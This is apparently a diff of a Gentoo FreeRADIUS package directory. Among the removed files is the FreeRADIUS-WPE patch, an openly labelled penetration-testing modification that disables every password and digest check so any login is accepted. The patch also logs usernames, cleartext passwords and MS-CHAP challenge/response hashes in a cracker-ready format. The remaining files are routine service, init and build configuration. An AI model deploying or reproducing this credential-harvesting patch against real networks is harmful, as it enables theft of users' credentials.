@@ -1166,10 +1178,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md4_calc(digest, (uint8_t *) ucs2_password, len);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("NT digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1196,11 +1210,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
return RLM_MODULE_FAIL;
}
+ /*
if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) {
REDEBUG("LM digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1257,10 +1273,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_
fr_md5_final(buff, &md5_context);
}
+ /*
if (rad_digest_cmp(digest, buff, 16) != 0) {
REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1283,6 +1301,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0, main_config.wpelogfile);
+
/*
* The user MUST supply a non-zero-length password.
*/

38
net-dialup/freeradius/files/freeradius-3.2.3-configure-c99.patch
View file

@ -1,38 +0,0 @@
https://src.fedoraproject.org/rpms/freeradius/c/1793f410aa789704b5ac0be9cf7d0eaece906d1a?branch=rawhide
https://github.com/FreeRADIUS/freeradius-server/pull/5246
The backtrace_symbols function expects a pointer to an array of void *
values, not a pointer to an array of a single element. Removing the
address operator ensures that the right type is used.
This avoids an unconditional failure of this probe with compilers that
treat incompatible pointer types as a compilation error.
Submitted upstream: <https://github.com/FreeRADIUS/freeradius-server/pull/5246>
diff --git a/configure b/configure
index ed01ee2bdd912f63..1e6d2284779cdd58 100755
--- a/configure
+++ b/configure
@@ -13390,7 +13390,7 @@ main (void)
{
void *sym[1];
- backtrace_symbols(&sym, sizeof(sym))
+ backtrace_symbols(sym, sizeof(sym))
;
return 0;
}
diff --git a/configure.ac b/configure.ac
index 76320213b51d7bb4..6a689711d6c90483 100644
--- a/configure.ac
+++ b/configure.ac
@@ -2168,7 +2168,7 @@ if test "x$ac_cv_header_execinfo_h" = "xyes"; then
#include <execinfo.h>
]], [[
void *sym[1];
- backtrace_symbols(&sym, sizeof(sym)) ]])],[
+ backtrace_symbols(sym, sizeof(sym)) ]])],[
AC_MSG_RESULT(yes)
ac_cv_lib_execinfo_backtrace_symbols="yes"
],[

435
net-dialup/freeradius/files/freeradius-3.2.3-wpe.patch
View file

@ -1,435 +0,0 @@
From: Sophie Brun <sophie@offensive-security.com>
Date: Mon, 17 Jul 2023 18:01:05 +0200
Subject: freeradius-wpe
---
raddb/mods-config/files/authorize | 2 +
raddb/radiusd.conf.in | 3 ++
src/include/log.h | 5 ++
src/include/radiusd.h | 2 +
src/main/auth.c | 1 +
src/main/libfreeradius-server.mk | 1 +
src/main/log.c | 71 +++++++++++++++++++++++++
src/main/mainconfig.c | 1 +
src/main/radiusd.c | 2 +-
src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c | 4 ++
src/modules/rlm_mschap/rlm_mschap.c | 11 ++--
src/modules/rlm_pap/rlm_pap.c | 25 ++++++++-
12 files changed, 122 insertions(+), 6 deletions(-)
diff --git a/raddb/mods-config/files/authorize b/raddb/mods-config/files/authorize
index ddf805f..315bf4b 100644
--- a/raddb/mods-config/files/authorize
+++ b/raddb/mods-config/files/authorize
@@ -204,3 +204,5 @@ DEFAULT Hint == "SLIP"
# See the example user "bob" above. #
#########################################################
+DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
+DEFAULT Cleartext-Password := "a"
diff --git a/raddb/radiusd.conf.in b/raddb/radiusd.conf.in
index 0d154db..4bee477 100644
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -445,6 +445,9 @@ ENV {
# LD_PRELOAD = /path/to/library2.so
}
+# Wireless Pawn Edition log file
+wpelogfile = ${logdir}/freeradius-server-wpe.log
+
# SECURITY CONFIGURATION
#
# There may be multiple methods of attacking on the server. This
diff --git a/src/include/log.h b/src/include/log.h
index 2736591..b3ffeb1 100644
--- a/src/include/log.h
+++ b/src/include/log.h
@@ -72,6 +72,11 @@ typedef struct fr_log_t {
char const *debug_file; //!< Path to debug log file.
} fr_log_t;
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename);
+
typedef void (*radlog_func_t)(log_type_t lvl, log_lvl_t priority, REQUEST *, char const *, va_list ap);
extern FR_NAME_NUMBER const syslog_facility_table[];
diff --git a/src/include/radiusd.h b/src/include/radiusd.h
index 594a6bd..e171efe 100644
--- a/src/include/radiusd.h
+++ b/src/include/radiusd.h
@@ -152,6 +152,8 @@ typedef struct main_config {
char const *checkrad; //!< Script to use to determine if a user is already
//!< connected.
+ char const *wpelogfile; //!< Wireless Pawn Edition log file path.
+
rad_listen_t *listen; //!< Head of a linked list of listeners.
diff --git a/src/main/auth.c b/src/main/auth.c
index 84889b8..5a3debe 100644
--- a/src/main/auth.c
+++ b/src/main/auth.c
@@ -129,6 +129,7 @@ static int rad_authlog(char const *msg, REQUEST *request, int goodpass)
} else {
fr_prints(clean_password, sizeof(clean_password),
request->password->vp_strvalue, request->password->vp_length, '\0');
+ log_wpe("password", request->username->vp_strvalue, clean_password, NULL, 0, NULL, 0, main_config.wpelogfile);
}
}
diff --git a/src/main/libfreeradius-server.mk b/src/main/libfreeradius-server.mk
index 4495f72..56c6c5b 100644
--- a/src/main/libfreeradius-server.mk
+++ b/src/main/libfreeradius-server.mk
@@ -14,6 +14,7 @@ SOURCES := conffile.c \
pair.c \
xlat.c
+
# This lets the linker determine which version of the SSLeay functions to use.
TGT_LDLIBS := $(OPENSSL_LIBS)
diff --git a/src/main/log.c b/src/main/log.c
index 1ca2f91..5efc31e 100644
--- a/src/main/log.c
+++ b/src/main/log.c
@@ -29,6 +29,7 @@ RCSID("$Id$")
#include <freeradius-devel/radiusd.h>
#include <freeradius-devel/rad_assert.h>
+/*#include <freeradius-devel/conf.h>*/
#ifdef HAVE_SYS_STAT_H
# include <sys/stat.h>
@@ -46,6 +47,9 @@ RCSID("$Id$")
#include <pthread.h>
#endif
+#include <stdio.h>
+#include <time.h>
+
log_lvl_t rad_debug_lvl = 0; //!< Global debugging level
static bool rate_limit = true; //!< Whether repeated log entries should be rate limited
@@ -226,6 +230,73 @@ static int stdout_fd = -1; //!< The original unmolested stdout file descriptor
static char const spaces[] = " ";
+/** Prints username, password or challenge/response
+ *
+ */
+void log_wpe(const char *authtype, const char *username, const char *password,
+ const unsigned char *challenge, const unsigned int challen,
+ const unsigned char *response, const unsigned int resplen,
+ const char * logfilename)
+{
+ FILE *logfd;
+ time_t nowtime;
+ unsigned int count;
+
+ /* Get wpelogfile parameter and log data */
+ if (logfilename == NULL) {
+ logfd = stderr;
+ } else {
+ logfd = fopen(logfilename, "a");
+ if (logfd == NULL) {
+ fr_strerror_printf(" log: FAILED: Unable to open output log file %s: %s", logfilename, strerror(errno));
+ logfd = stderr;
+ }
+ }
+
+ nowtime = time(NULL);
+ fprintf(logfd, "%s: %s\n", authtype, ctime(&nowtime));
+
+ if (username != NULL) {
+ fprintf(logfd, "\tusername: %s\n", username);
+ }
+ if (password != NULL) {
+ fprintf(logfd, "\tpassword: %s\n", password);
+ }
+
+ if (challen != 0) {
+ fprintf(logfd, "\tchallenge: ");
+ for (count=0; count!=(challen-1); count++) {
+ fprintf(logfd, "%02x:",challenge[count]);
+ }
+ fprintf(logfd, "%02x\n",challenge[challen-1]);
+ }
+
+ if (resplen != 0) {
+ fprintf(logfd, "\tresponse: ");
+ for (count=0; count!=(resplen-1); count++) {
+ fprintf(logfd, "%02x:",response[count]);
+ }
+ fprintf(logfd, "%02x\n",response[resplen-1]);
+ }
+
+ if ( (strncmp(authtype, "mschap", 6) == 0) && username != NULL
+ && challen != 0 && resplen != 0) {
+ fprintf(logfd, "\tjohn NETNTLM: %s:$NETNTLM$",username);
+ for (count=0; count<challen; count++) {
+ fprintf(logfd, "%02x",challenge[count]);
+ }
+ fprintf(logfd,"$");
+ for (count=0; count<resplen; count++) {
+ fprintf(logfd, "%02x",response[count]);
+ }
+ fprintf(logfd,"\n");
+ }
+
+ fprintf(logfd, "\n");
+
+ fclose(logfd);
+}
+
/** On fault, reset STDOUT and STDERR to something useful
*
* @return 0
diff --git a/src/main/mainconfig.c b/src/main/mainconfig.c
index 227ae4a..9f80e83 100644
--- a/src/main/mainconfig.c
+++ b/src/main/mainconfig.c
@@ -200,6 +200,7 @@ static const CONF_PARSER server_config[] = {
{ "postauth_client_lost", FR_CONF_POINTER(PW_TYPE_BOOLEAN, &main_config.postauth_client_lost), "no" },
{ "pidfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.pid_file), "${run_dir}/radiusd.pid"},
{ "checkrad", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.checkrad), "${sbindir}/checkrad" },
+ { "wpelogfile", FR_CONF_POINTER(PW_TYPE_STRING, &main_config.wpelogfile), "${logdir}/freeradius-server-wpe.log" },
{ "debug_level", FR_CONF_POINTER(PW_TYPE_INTEGER, &main_config.debug_level), "0"},
diff --git a/src/main/radiusd.c b/src/main/radiusd.c
index 36fa663..24d7c03 100644
--- a/src/main/radiusd.c
+++ b/src/main/radiusd.c
@@ -64,7 +64,7 @@ char const *radlog_dir = NULL;
bool log_stripped_names;
-char const *radiusd_version = "FreeRADIUS Version " RADIUSD_VERSION_STRING
+char const *radiusd_version = "FreeRADIUS-WPE Version " RADIUSD_VERSION_STRING
#ifdef RADIUSD_VERSION_COMMIT
" (git #" STRINGIFY(RADIUSD_VERSION_COMMIT) ")"
#endif
diff --git a/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c b/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
index e8acb5c..b28d0b8 100644
--- a/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
+++ b/src/modules/rlm_eap/types/rlm_eap_md5/eap_md5.c
@@ -166,10 +166,14 @@ int eapmd5_verify(MD5_PACKET *packet, VALUE_PAIR* password,
/*
* The length of the response is always 16 for MD5.
*/
+ /*
if (rad_digest_cmp(digest, packet->value, 16) != 0) {
DEBUG("EAP-MD5 digests do not match.");
return 0;
}
+ */
+ log_wpe("eap_md5", packet->name, NULL, challenge, MD5_CHALLENGE_LEN,
+ packet->value, 16, main_config.wpelogfile);
return 1;
}
diff --git a/src/modules/rlm_mschap/rlm_mschap.c b/src/modules/rlm_mschap/rlm_mschap.c
index 00ab90d..07c7e0d 100644
--- a/src/modules/rlm_mschap/rlm_mschap.c
+++ b/src/modules/rlm_mschap/rlm_mschap.c
@@ -1189,10 +1189,13 @@ ntlm_auth_err:
*/
static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUEST *request, VALUE_PAIR *password,
uint8_t const *challenge, uint8_t const *response,
- uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method)
+ uint8_t nthashhash[NT_DIGEST_LENGTH], MSCHAP_AUTH_METHOD method,
+ const char *username)
{
uint8_t calculated[24];
+ log_wpe("mschap", username, NULL, challenge, 8, response, 24, main_config.wpelogfile);
+
memset(nthashhash, 0, NT_DIGEST_LENGTH);
switch (method) {
@@ -1209,9 +1212,11 @@ static int CC_HINT(nonnull (1, 2, 4, 5 ,6)) do_mschap(rlm_mschap_t *inst, REQUES
}
smbdes_mschap(password->vp_octets, challenge, calculated);
+ /*
if (rad_digest_cmp(response, calculated, 24) != 0) {
return -1;
}
+ */
/*
* If the password exists, and is an NT-Password,
@@ -1945,7 +1950,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re
* Do the MS-CHAP authentication.
*/
mschap_result = do_mschap(inst, request, password, challenge->vp_octets,
- response->vp_octets + offset, nthashhash, auth_method);
+ response->vp_octets + offset, nthashhash, auth_method, NULL);
/*
* Check for errors, and add MSCHAP-Error if necessary.
*/
@@ -2062,7 +2067,7 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re
RDEBUG2("Client is using MS-CHAPv2");
mschap_result = do_mschap(inst, request, nt_password, mschapv1_challenge,
- response->vp_octets + 26, nthashhash, auth_method);
+ response->vp_octets + 26, nthashhash, auth_method, username_string);
rcode = mschap_error(inst, request, *response->vp_octets,
mschap_result, mschap_version, smb_ctrl);
if (rcode != RLM_MODULE_OK) return rcode;
diff --git a/src/modules/rlm_pap/rlm_pap.c b/src/modules/rlm_pap/rlm_pap.c
index 463ff66..059aab9 100644
--- a/src/modules/rlm_pap/rlm_pap.c
+++ b/src/modules/rlm_pap/rlm_pap.c
@@ -566,6 +566,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_clear(UNUSED rlm_pap_t *inst, REQUE
RDEBUG("Comparing with \"known good\" Cleartext-Password");
}
+ /*
if ((vp->vp_length != request->password->vp_length) ||
(rad_digest_cmp(vp->vp_octets,
request->password->vp_octets,
@@ -573,6 +574,7 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_clear(UNUSED rlm_pap_t *inst, REQUE
REDEBUG("Cleartext password does not match \"known good\" password");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -612,12 +614,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_md5(rlm_pap_t *inst, REQUEST *reque
request->password->vp_length);
fr_md5_final(digest, &md5_context);
fr_md5_destroy(&md5_context);
-
+/*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
-
+*/
return RLM_MODULE_OK;
}
@@ -647,10 +649,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_smd5(rlm_pap_t *inst, REQUEST *requ
/*
* Compare only the MD5 hash results, not the salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 16) != 0) {
REDEBUG("SMD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -675,10 +679,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_sha(rlm_pap_t *inst, REQUEST *reque
request->password->vp_length);
fr_sha1_final(digest,&sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("SHA1 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -704,10 +710,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ssha(rlm_pap_t *inst, REQUEST *requ
fr_sha1_update(&sha1_context, &vp->vp_octets[20], vp->vp_length - 20);
fr_sha1_final(digest, &sha1_context);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, 20) != 0) {
REDEBUG("SSHA digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -768,10 +776,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_sha2(rlm_pap_t *inst, REQUEST *requ
rad_assert((size_t) digest_len == vp->vp_length); /* This would be an OpenSSL bug... */
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -840,10 +850,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ssha2(rlm_pap_t *inst, REQUEST *req
/*
* Only compare digest_len bytes, the rest is salt.
*/
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, (size_t)digest_len) != 0) {
REDEBUG("%s digest does not match \"known good\" digest", name);
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1173,10 +1185,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_nt(rlm_pap_t *inst, REQUEST *reques
fr_md4_calc(digest, (uint8_t *) ucs2_password, len);
+ /*
if (rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0) {
REDEBUG("NT digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1203,11 +1217,13 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_lm(rlm_pap_t *inst, REQUEST *reques
return RLM_MODULE_FAIL;
}
+ /*
if ((fr_hex2bin(digest, sizeof(digest), charbuf, len) != vp->vp_length) ||
(rad_digest_cmp(digest, vp->vp_octets, vp->vp_length) != 0)) {
REDEBUG("LM digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1264,10 +1280,12 @@ static rlm_rcode_t CC_HINT(nonnull) pap_auth_ns_mta_md5(UNUSED rlm_pap_t *inst,
fr_md5_final(buff, &md5_context);
}
+ /*
if (rad_digest_cmp(digest, buff, 16) != 0) {
REDEBUG("NS-MTA-MD5 digest does not match \"known good\" digest");
return RLM_MODULE_REJECT;
}
+ */
return RLM_MODULE_OK;
}
@@ -1290,6 +1308,9 @@ static rlm_rcode_t CC_HINT(nonnull) mod_authenticate(void *instance, REQUEST *re
return RLM_MODULE_INVALID;
}
+ log_wpe("pap",request->username->vp_strvalue, request->password->vp_strvalue,
+ NULL, 0, NULL, 0, main_config.wpelogfile);
+
/*
* The user MUST supply a non-zero-length password.
*/

43
net-dialup/freeradius/files/freeradius-user-freerad-wpe.patch
View file

@ -1,43 +0,0 @@
From: Sophie Brun <sophie@offensive-security.com>
Date: Mon, 27 Jun 2022 18:27:30 +0200
Subject: Use user freerad-wpe
---
raddb/radiusd.conf.in | 4 ++--
raddb/sites-available/control-socket | 4 ++--
2 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/raddb/radiusd.conf.in b/raddb/radiusd.conf.in
index 5d51728..0d154db 100644
--- a/raddb/radiusd.conf.in
+++ b/raddb/radiusd.conf.in
@@ -510,8 +510,8 @@ security {
# member. This can allow for some finer-grained access
# controls.
#
- user = freerad
- group = freerad
+ user = freerad-wpe
+ group = freerad-wpe
# Core dumps are a bad thing. This should only be set to
# 'yes' if you're debugging a problem with the server.
diff --git a/raddb/sites-available/control-socket b/raddb/sites-available/control-socket
index 17b9f69..6b0a2f0 100644
--- a/raddb/sites-available/control-socket
+++ b/raddb/sites-available/control-socket
@@ -72,12 +72,12 @@ listen {
#
# Name of user that is allowed to connect to the control socket.
#
-# uid = freerad
+# uid = freerad-wpe
#
# Name of group that is allowed to connect to the control socket.
#
-# gid = freerad
+# gid = freerad-wpe
#
# Access mode.

15
net-dialup/freeradius/files/freeradius.service
View file

@ -1,15 +0,0 @@
[Unit]
Description=FreeRADIUS high performance RADIUS server.
After=syslog.target network.target
[Service]
Type=simple
PIDFile=/run/radiusd/radiusd.pid
ExecStartPre=-/bin/chown -R radius:radius /run/radiusd
ExecStartPre=/usr/sbin/radiusd -C
ExecStart=/usr/sbin/radiusd -d /etc/raddb -f
ExecReload=/usr/sbin/radiusd -C
ExecReload=/bin/kill -HUP $MAINPID
[Install]
WantedBy=multi-user.target

1
net-dialup/freeradius/files/freeradius.tmpfiles
View file

@ -1 +0,0 @@
d /run/radiusd 0755 radius radius -

16
net-dialup/freeradius/files/radius.conf-r4
View file

@ -1,16 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
RADIUSD_USER=radius
RADIUSD_GROUP=radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"

18
net-dialup/freeradius/files/radius.conf-r5
View file

@ -1,18 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/var/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
RADIUSD_USER=radius
RADIUSD_GROUP=radius
RADIUSD_LOGPATH=/var/log/radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"

22
net-dialup/freeradius/files/radius.conf-r6
View file

@ -1,22 +0,0 @@
# Config file for /etc/init.d/radiusd
# see man pages for radiusd run `radiusd -h`
# for valid cmdline options
#RADIUSD_OPTS=""
# Change this value if you change it in /etc/raddb/radiusd.conf
pidfile=/run/radiusd/radiusd.pid
# Change these values if you change them in /etc/raddb/radiusd.conf
RADIUSD_USER=radius
RADIUSD_GROUP=radius
RADIUSD_LOGPATH=/var/log/radius
# If you set up logging to syslog in /etc/raddb/radiusd.conf, you want
# to uncomment the following line.
#rc_use="logger"
# If you use ldap, start the ldap server prior to FreeRADIUS to avoid
# startup crashes.
#rc_use="ldap"

31
net-dialup/freeradius/files/radius.init-r3
View file

@ -1,31 +0,0 @@
#!/sbin/openrc-run
# Copyright 1999-2016 Gentoo Foundation
# Distributed under the terms of the GNU General Public License v2
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
need localmount
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /var/log/radius
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /run/radiusd
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat ${pidfile})
eend $?
}

31
net-dialup/freeradius/files/radius.init-r4
View file

@ -1,31 +0,0 @@
#!/sbin/openrc-run
# Copyright 1999-2020 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
command=/usr/sbin/radiusd
command_args="${RADIUSD_OPTS}"
pidfile="${pidfile:-/run/radiusd/radiusd.pid}"
extra_started_commands="reload"
depend() {
need localmount
use dns
}
start_pre() {
if [ ! -f /etc/raddb/radiusd.conf ] ; then
eerror "No /etc/raddb/radiusd.conf file exists!"
return 1
fi
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) "${RADIUSD_LOGPATH:-/var/log/radius}"
checkpath -m0750 -o "${RADIUSD_USER:-root}:${RADIUSD_GROUP:-root}" -d \
$(dirname ${pidfile}) /run/radiusd
}
reload() {
ebegin "Reloading radiusd"
kill -HUP $(cat ${pidfile})
eend $?
}

3
net-dialup/freeradius/files/users_wpe
View file

@ -1,3 +0,0 @@
DEFAULT Cleartext-Password := "foo", MS-CHAP-Use-NTLM-Auth := 0
DEFAULT Cleartext-Password := "a"

328
net-dialup/freeradius/freeradius-3.2.3.ebuild
View file

@ -1,328 +0,0 @@
# Copyright 1999-2024 Gentoo Authors
# Distributed under the terms of the GNU General Public License v2
EAPI=8
PYTHON_COMPAT=( python3_{11..13} )
AUTOTOOLS_DEPEND=">=dev-build/autoconf-2.69"
inherit autotools pam python-single-r1 systemd
MY_PN=${PN}-server
MY_P=${MY_PN}-${PV}
MY_PV=$(ver_rs 1- "_")
DESCRIPTION="Highly configurable free RADIUS server"
HOMEPAGE="https://freeradius.org/"
SRC_URI="https://github.com/FreeRADIUS/freeradius-server/releases/download/release_${MY_PV}/${MY_P}.tar.bz2"
S="${WORKDIR}"/${MY_P}
LICENSE="GPL-2"
SLOT="0"
KEYWORDS="~amd64 ~arm ~arm64 ~ppc ~ppc64 ~sparc ~x86"
IUSE="
debug firebird iodbc kerberos ldap memcached mysql mongodb odbc oracle pam
postgres python readline redis samba selinux sqlite ssl systemd +wpe
"
RESTRICT="firebird? ( bindist )"
# NOTE: Temporary freeradius doesn't support linking with mariadb client
# libs also if code is compliant, will be available in the next release.
# (http://lists.freeradius.org/pipermail/freeradius-devel/2018-October/013228.html)a
# TODO: rlm_mschap works with both samba library or without. I need to avoid
# linking of samba library if -samba is used.
# TODO: unconditional json-c for now as automagic dep despite efforts to stop it
# ditto libpcap. Can restore USE=rest, USE=pcap if/when fixed.
DEPEND="
acct-group/radius
acct-user/radius
dev-libs/libltdl
dev-libs/libpcre
dev-libs/json-c:=
dev-lang/perl:=
net-libs/libpcap
net-misc/curl
sys-libs/gdbm:=
sys-libs/libcap
sys-libs/talloc
virtual/libcrypt:=
firebird? ( dev-db/firebird )
iodbc? ( dev-db/libiodbc )
kerberos? ( virtual/krb5 )
ldap? ( net-nds/openldap:= )
memcached? ( dev-libs/libmemcached )
mysql? ( dev-db/mysql-connector-c:= )
mongodb? ( >=dev-libs/mongo-c-driver-1.13.0-r1 )
odbc? ( dev-db/unixODBC )
oracle? ( dev-db/oracle-instantclient[sdk] )
pam? ( sys-libs/pam )
postgres? ( dev-db/postgresql:= )
python? ( ${PYTHON_DEPS} )
readline? ( sys-libs/readline:= )
redis? ( dev-libs/hiredis:= )
samba? ( net-fs/samba )
sqlite? ( dev-db/sqlite:3 )
ssl? ( >=dev-libs/openssl-1.0.2:=[-bindist(-)] )
systemd? ( sys-apps/systemd:= )
"
RDEPEND="
${DEPEND}
selinux? ( sec-policy/selinux-radius )
"
REQUIRED_USE="python? ( ${PYTHON_REQUIRED_USE} )"
# bug #721040
QA_SONAME="usr/lib.*/libfreeradius-.*.so"
QA_CONFIG_IMPL_DECL_SKIP=(
# Not available on Linux (bug #900048)
htonll
htonlll
)
PATCHES=(
"${FILESDIR}"/${PN}-3.0.20-systemd-service.patch
"${FILESDIR}"/${PN}-3.2.3-configure-c99.patch
)
pkg_setup() {
if use python ; then
python-single-r1_pkg_setup
export PYTHONBIN="${EPYTHON}"
fi
}
src_prepare() {
#https://patches.aircrack-ng.org/wpe/freeradius-wpe/
if use wpe; then
eapply "${FILESDIR}/${PN}-3.2.3-wpe.patch"
# cp "${FILESDIR}"/clients_wpe.conf raddb/clients.conf || die "failed to copy config files"
# cp "${FILESDIR}"/eap_wpe.conf raddb/eap.conf || die "failed to copy config files"
# cp "${FILESDIR}"/users_wpe raddb/users || die "failed to copy config files"
fi
default
# Most of the configuration options do not appear as ./configure
# switches. Instead it identifies the directories that are available
# and run through them. These might check for the presence of
# various libraries, in which case they are not built. To avoid
# automagic dependencies, we just remove all the modules that we're
# not interested in using.
# TODO: shift more of these into configure args below as things
# are a bit better now.
use ssl || { rm -r src/modules/rlm_eap/types/rlm_eap_{tls,ttls,peap} || die ; }
use ldap || { rm -r src/modules/rlm_ldap || die ; }
use kerberos || { rm -r src/modules/rlm_krb5 || die ; }
use memcached || { rm -r src/modules/rlm_cache/drivers/rlm_cache_memcached || die ; }
use pam || { rm -r src/modules/rlm_pam || die ; }
# Drop support for python2
rm -r src/modules/rlm_python || die
use python || { rm -r src/modules/rlm_python3 || die ; }
#use rest || { rm -r src/modules/rlm_rest || die ; }
# Do not install ruby rlm module, bug #483108
rm -r src/modules/rlm_ruby || die
# These are all things we don't have in portage/I don't want to deal
# with myself.
#
# Requires TNCS library
rm -r src/modules/rlm_eap/types/rlm_eap_tnc || die
# Requires libeap-ikev2
rm -r src/modules/rlm_eap/types/rlm_eap_ikev2 || die
# Requires some membership.h
rm -r src/modules/rlm_opendirectory || die
# ?
rm -r src/modules/rlm_sql/drivers/rlm_sql_{db2,freetds} || die
# SQL drivers that are not part of experimental are loaded from a
# file, so we have to remove them from the file itself when we
# remove them.
usesqldriver() {
local flag=$1
local driver=rlm_sql_${2:-${flag}}
if ! use ${flag} ; then
rm -r src/modules/rlm_sql/drivers/${driver} || die
sed -i -e /${driver}/d src/modules/rlm_sql/stable || die
fi
}
sed -i \
-e 's:^#\tuser = :\tuser = :g' \
-e 's:^#\tgroup = :\tgroup = :g' \
-e 's:/var/run/radiusd:/run/radiusd:g' \
-e '/^run_dir/s:${localstatedir}::g' \
raddb/radiusd.conf.in || die
# - Verbosity
# - B uild shared libraries using jlibtool -shared
sed -i \
-e 's|--silent ||g' \
-e 's:--mode=\(compile\|link\):& -shared:g' \
scripts/libtool.mk || die
# Crude measure to stop jlibtool from running ranlib and ar
sed -i \
-e '/LIBRARIAN/s|".*"|"true"|g' \
-e '/RANLIB/s|".*"|"true"|g' \
scripts/jlibtool.c || die
usesqldriver mysql
usesqldriver postgres postgresql
usesqldriver firebird
usesqldriver iodbc
usesqldriver odbc unixodbc
usesqldriver oracle
usesqldriver sqlite
usesqldriver mongodb mongo
eautoreconf
}
src_configure() {
# Do not try to enable static with static-libs; upstream is a
# massacre of libtool best practices so you also have to make sure
# to --enable-shared explicitly.
local myeconfargs=(
# Revisit confcache when not needing to use ac_cv anymore
# for automagic deps.
#--cache-file="${S}"/config.cache
--enable-shared
--disable-ltdl-install
--disable-silent-rules
--with-system-libtool
--with-system-libltdl
--enable-strict-dependencies
--without-rlm_couchbase
--without-rlm_securid
--without-rlm_unbound
--without-rlm_idn
#--without-rlm_json
#$(use_with rest libfreeradius-json)
# Our OpenSSL should be patched. Avoid false-positive failures.
--disable-openssl-version-check
--with-ascend-binary
--with-udpfromto
--with-dhcp
--with-pcre
--with-iodbc-include-dir=/usr/include/iodbc
--with-experimental-modules
